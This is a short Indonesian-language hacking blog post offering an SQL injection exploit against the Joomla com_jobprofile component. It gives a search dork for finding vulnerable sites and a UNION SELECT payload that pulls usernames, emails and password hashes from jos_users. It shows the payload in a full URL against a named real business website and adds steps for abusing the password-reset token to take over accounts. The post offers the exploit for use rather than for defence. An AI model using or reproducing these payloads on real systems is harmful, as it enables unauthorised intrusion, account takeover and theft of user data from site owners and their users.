Joomla SQLi Vuln
selamat siang sobat ada sdikit mainan nihh buat yg masih belajar kaya ane =))
mungkin ni exploit jadul tp masih work cuy :*
buat master lewat ajah yaahh =))
dork : inurl:"index.php?option=com_jobprofile... dork bisa di explorasi lg sesuka hati =))
exploit : +union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_users–
demo :http://www.chartercommerce.com.au/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=1
http://www.chartercommerce.com.au/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat_ws(0x3a,id,name,username,email,password,usertype,block,sendEmail,gid,registerDate,lastvisitDate,activation,params),3,4,5,6,7,8,9+from+jos_users--
reset pass : /index.php?option=com_user&view=reset
masukin emailnya d kolom itu lalu klik submit ,,setelah itu masukan token yg di dapat td lalu klik submit...alhasil tinggal tulis password baru =)),,,
NB : kalo tokennya ada symbol $$$$ ( salt ) mendingan cari target lain karena w juga mumet ma salt piye carane buat tusbol =))
0 comments:
Post a Comment